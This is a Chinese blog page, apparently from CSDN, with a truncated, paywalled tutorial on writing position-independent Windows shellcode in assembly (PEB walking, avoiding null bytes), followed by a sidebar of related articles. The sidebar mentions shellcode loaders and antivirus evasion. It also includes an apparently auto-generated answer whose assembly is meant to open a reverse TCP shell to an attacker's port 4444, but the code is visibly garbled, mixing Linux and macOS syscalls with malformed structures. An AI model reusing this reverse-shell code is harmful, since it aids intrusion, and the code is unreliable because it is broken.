用ASM编写一个简单的Windows Shellcode思路总结

最新推荐文章于 2024-05-26 09:42:12 发布
原创 最新推荐文章于 2024-05-26 09:42:12 发布 · 539 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #c# #网络安全

本文介绍了Shellcode的基本概念,详细讲解了Windows下DLL加载机制、DLL寻址、DLL导出表中函数寻址,以及如何dump Shellcode和编写Golang loader。通过实例展示了如何在避免NULL字节和特殊字符的情况下编写位置无关的Shellcode。

在这里插入图片描述

shellcode 是什么?

“代码也好数据也好只要是与位置无关的二进制就都是shellcode。”
为了写出位置无关的代码,需要注意以下几点:

  • 不能对字符串使用直接偏移,必须将字符串存储在堆栈中
  • dll中的函数寻址,由于 ASLR 不会每次都在同一个地址中加载,可以通过 PEB.PEB_LDR_DATA
    找到加载模块调用其导出的函数,或加载新 dll。
  • 避免空字节

NULL 字节的值为 0x00,在 C/C++ 代码中,NULL 字节被视为字符串的终止符。因此,shellcode 中这些字节的存在可能会干扰目标应用程序的功能,并且我们的 shellcode 可能无法正确复制到内存中。

mov ebx, 0x00
   xor ebx, ebx

用下面的语句代替上面的语句,结果是一样的。

此外,在某些特定情况下,shellcode 必须避免使用字符,例如 \r 或 \n,甚至只使用字母数字字符。

windows下dll加载的机制

在 Windows 中,应用程序不能直接访问系统调用,使用来自 Windows API ( WinAPI ) 的函数,Windows API函数都存储在 kernel32.dll、advapi32.dll、gdi32.dll 等中。ntdll.dll 和 kernel32.dll 非常重要,以至于每个进程都会导入它们:

这是我编写 nothing_to_do 程序,用 listdlls列出导入的 dll:
在这里插入图片描述

dll寻址

TEB(线程环境块)该结构包含用户模式中的线程信息,32位系统中我们可以使用 FS 寄存器在偏移0x30处找到进程环境块(PEB) 的地址。
在这里插入图片描述
PEB.ldr 指向PEB_LDR_DATA提供有关加载模块的信息的结构的指针,包含kernel32 和 ntdll 的基地址

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

PEB_LDR_DATA.InMemoryOrderModuleList 包含进程加载模块的双向链表的头部。列表中的每一项都是指向 LDR_DATA_TABLE_ENTRY 结构的指针

typedef struct _LIST_ENTRY
{
     PLIST_ENTRY Flink;
     PLIST_ENTRY Blink;
} LIST_ENTRY, *PLIST_ENTRY;

LDR_DATA_TABLE_ENTRY 加载

最低0.47元/天 解锁文章
windows 平台shellcode编写
fanghuapyk的博客
05-21 1137
0x00、介绍 比方说你手头上有一个IE或FlashPlayer现成的漏洞利用代码,但它只能够打开计算器calc.exe。但是这实际上并没有什么卵用,不是吗?你真正想要的是可以执行一些远程命令或实现其他有用的功能。 在这种情况下,你可能想要利用已有的标准shellcode,比如来自Shell Storm数据库或由Metasploit的msfvenom工具生成。不过,你必须先理解编写shellcode的基本原则,才可以在自己的漏洞利用代码中有效地使用它们。对于不熟悉这个术语的同学们,可以参考一下维基百科: 在
Windows Shellcode开发[3]
weixin_41487541的博客
03-25 5685
0 前言及编写shellcode准备工作 在Windows Shellcode开发介绍的最后一部分,我们将编写一个简单的改变鼠标左右键的shellcode。我们需要用到两个函数:SwapMouseButton和ExitProcess函数。首先看一个两个函数的参数与返回值情况: SwapMouseButton只有一个BOOL类型参数,若参为TRUE则交换鼠标左右键,返回值非0; ExitProcess也只有一个参数,代表进程退出代码。 整理一下思路: 我们需要调用以上两个函数,在C++中体现
windows编程之Windows Shell 编程
thanklife的专栏
04-11 2149
这里仅仅是记录下该资源,推荐到下文列出的连接进行查看 用VC++ 进行Windows Shell 扩展编成               由ccc编译   序言:        看过一些对windows 外壳的扩展程序,在使用上一般都是直接利用windows的外壳API做一些工作,因为外壳操作需要一些比较专业的知识,因此,大部分编程人员特别是
asm to shellcode
10-18
将汇编转换成shellcode,先写出汇编,然后自动生成shellcode,很是方便
ASM快速编写工具
07-12
ASM快速编写工具
Windows Shell 编程
邓学彬(泪闯天涯)的专栏
11-19 3381
<br />CHM格式电子书下载:http://download.youkuaiyun.com/source/2843130<br /> <br />说明:该书内容并不是我写的,我只是整理成电子书,方便大家阅读。<br /> <br />一个操作系统外壳的不错的定义是它是一个系统提供的用户界面,它允许用户执行公共的任务,如访问文件系统,导出执行程序,改变系统设置等。MS-DOS有一个Command.COM扮演着这个角色。然而Windows已经有了图形界面环境,他的外壳程序也就必然是图形方式的。在Windows95以前,
shellcode流程
weixin_30345055的博客
02-19 182
shellcode就是汇编的opcode,一般以子函数形式出现: 取得shellcode的方便方式是: 1.写一个函数如: void __stdcall code(LONG &a, LONG &b, DWORD &c, LONG &d, DWORD &e)取得它的汇编码:如: push ebp ...
shellcode编写探究
hongduilanjun的博客
07-21 1230
shellcode是不依赖环境,放到任何地方都可以执行的机器码。shellcode的应用场景很多,本文不研究shellcode的具体应用,而只是研究编写一个shellcode需要掌握哪些知识。
使用c语言生成一个shellcode的加载器,从1.ping当中获取shellcode,进行shellcode加载
最新发布
07-24
我们使用C语言编写一个shellcode加载器,从文件"1.ping"中读取shellcode并加载执行。主要步骤包括: 1. 打开文件并读取shellcode到内存 2. 分配可执行内存(重要:因为默认内存可能不可执行) 3. 将shellcode复制...
windows 弹shell_一步步学写Windows下的Shellcode
weixin_39602560的博客
10-21 869
如何在WIndows编写一个shellcode?为什么会问这个问题,前段时间在做win下的Exploit,但是都是使用大佬写的shellcode,无法实现个人的一些需求。而网络上编写shellcode的教程大多是关于Linux的,加之顺带学习PE文件结构,所以打算写一篇关于Windowsshellcode编写,为要编写Shellcdoe的读者提供一些参考。摘要:在C语言中,调用一...
shellcode_generator:shellcode,生成器,Visual Studio,C ++,Windows
03-09
shellcode_generator shellcode,生成器,Visual Studio,C ++,Windows
64位windows驱动使用asm
weixin_34152820的博客
12-26 776
64位windows驱动使用asm, 要单独写一个asm文件 命令ml64 /c test.asm编译成obj文件 SOURCES加上test.asm .data ; all data variables in your asm code goes here myData1 dq 0 ; 64 bit data .code ; all...
ShellCode的几种调用方法
weixin_30326515的博客
08-31 480
ShellCode是一种漏洞代码,中文名也叫填充数据,一般是用C语言或者汇编编写。在研究的过程中,自己也学到了一些东西,发现其中也有许多坑,所以贴出来,如果大家有碰到的,可以参考一下。 以启动电脑上的计算器为例,编写ShellCode其实就是两部分,一是获取ShellCode字节码,二是调用它。 获取方式一般是观察代码反汇编和内存相结合: VOID Test() { H...
pwntools各使用模块简介
weixin_34259232的博客
09-12 985
pwntools pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,并且里面包含多个模块,使利用变得简单。可以在github上直接搜索pwntools 进行安装。 基本模块 asm : 汇编与反汇编,支持x86/x64/arm/mips/powerpc等基本上所有的主流平台dynelf : 用于远程符号泄漏,需要提供leak方法el...
免杀对抗-ShellCode上线+回调编译执行+混淆变异算法
xiaoheizi的博客
09-10 3908
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。2.将shellcode放到执行脚本中(使用的调用执行方式是:申请动态内存加载),利用C/C++语言编译成exe执行文件。因为shellcode的免杀手段多,损坏的可能性小,能自定义更多选择。3.将新的shellcode放到自写的执行脚本xor.cpp中,使用。
Shellcode的原理及编写
热门推荐
maotoula的专栏
01-19 7万+
1.shellcode原理
执行shellcode的几种方式
qq_41683305的博客
02-24 5351
首先写出汇编成功弹出计算器 #pragma comment(linker,"/section:.data,RWE") //data段可读写 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口 #pragma comment(linker,"/INCREMENTAL:NO") //指...
ASM Shell 基于 Unicorn 的强大汇编器命令行工具
gitblog_00060的博客
05-26 420
ASM Shell 基于 Unicorn 的强大汇编器命令行工具 asm-cliInteractive shell of assembly language(X86/X64) based on unicorn and keystone项目地址:https://gitcode.com/gh_mirrors/as/asm-cli 1、项目介绍 ASM Shell 是一个基于 Unicorn Engi...
编写一个简单Shellcode以实现反向TCP连接的具体步骤和代码示例是什么?
11-09
编写一个简单Shellcode实现反向TCP连接,你需要深入理解网络编程和Shellcode的开发。这里提供一个实战项目的关键步骤和示例代码,帮助你实现反向TCP连接。 参考资源链接:[利用Shellcode进行网络安全渗透测试:复杂动作与开发概览](https://wenku.youkuaiyun.com/doc/46o4hp5xwb?spm=1055.2569.3001.10343) 首先,确保你熟悉汇编语言以及你的目标操作系统的网络API。下面是一个基于Linux系统的x86架构的简单示例,使用了socket编程实现反向连接。 1. 创建socket:首先,你需要创建一个TCP socket来实现网络连接。 2. 连接到服务器:通过socket连接到攻击者的主机(监听端口)。 3. 程序执行流程控制:确保连接成功后,程序应该转向执行shell命令。 具体的汇编代码示例如下: ```asm ; Create socket xor eax, eax mul eax ; Clear registers mov bl, 6 mov eax, 0x66 int 0x80 ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP) ; Store socket descriptor in EDI mov edi, eax ; Create the struct for connect() xor eax, eax mov byte [esi], al mov byte [esi+1], 0x11 mov word [esi+2], 0x5c11 xor eax, eax mov byte [esi+4], al mov byte [esi+5], al mov byte [esi+6], al mov byte [esi+7], al ; Store the IP Address and Port in Network Byte Order mov word [esi+8], 0x0202 ; ***.*.*.* in Network Byte Order mov word [esi+10], 0x5c11 ; Port 4444 in Network Byte Order ; Perform the connect() system call mov byte [esi+12], 0x06 ; SOCK_STREAM mov byte [esi+13], 0x01 ; AF_INET mov byte [esi+14], 0x00 ; Use the stack pointer as the buffer mov eax, 0x2000003 ; sys_connect int 0x80 ; Store the socket descriptor for use in writing data ; and close the original descriptor mov ebx, edi xor eax, eax mov al, 6 ; close sys call int 0x80 mov edi, ebx ; Write the shell code to the socket mov eax, 0x4 ; sys_write mov ebx, edi ; file descriptor of the socket mov ecx, esp ; buffer pointer mov edx, 100 ; buffer size int 0x80 ; Execute shellcode from socket xor eax, eax xor ebx, ebx xor ecx, ecx xor edx, edx int 0x80 ; The exploit should now be running a shell on the ; connected socket. The end of the shellcode should ; be padded with NOPs to ensure that it doesn't break ; any shellcode that might follow it. ; Padding add byte [esi+14], 0x90 ``` 在编写Shellcode时,还需要注意字符编码的转换以及字节对齐的问题。在实际使用中,你可能需要根据实际情况对上述代码进行调整,并确保代码在目标系统的内存中正确执行。 这份示例代码只是一个起点,为了更深入理解Shellcode的开发和利用,建议阅读《利用Shellcode进行网络安全渗透测试:复杂动作与开发概览》。该文档不仅提供了概念性的介绍,还详细地展示了shellcode的开发过程和各种技巧,以及如何在现实世界的安全测试中应用这些知识。 参考资源链接:[利用Shellcode进行网络安全渗透测试:复杂动作与开发概览](https://wenku.youkuaiyun.com/doc/46o4hp5xwb?spm=1055.2569.3001.10343)
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值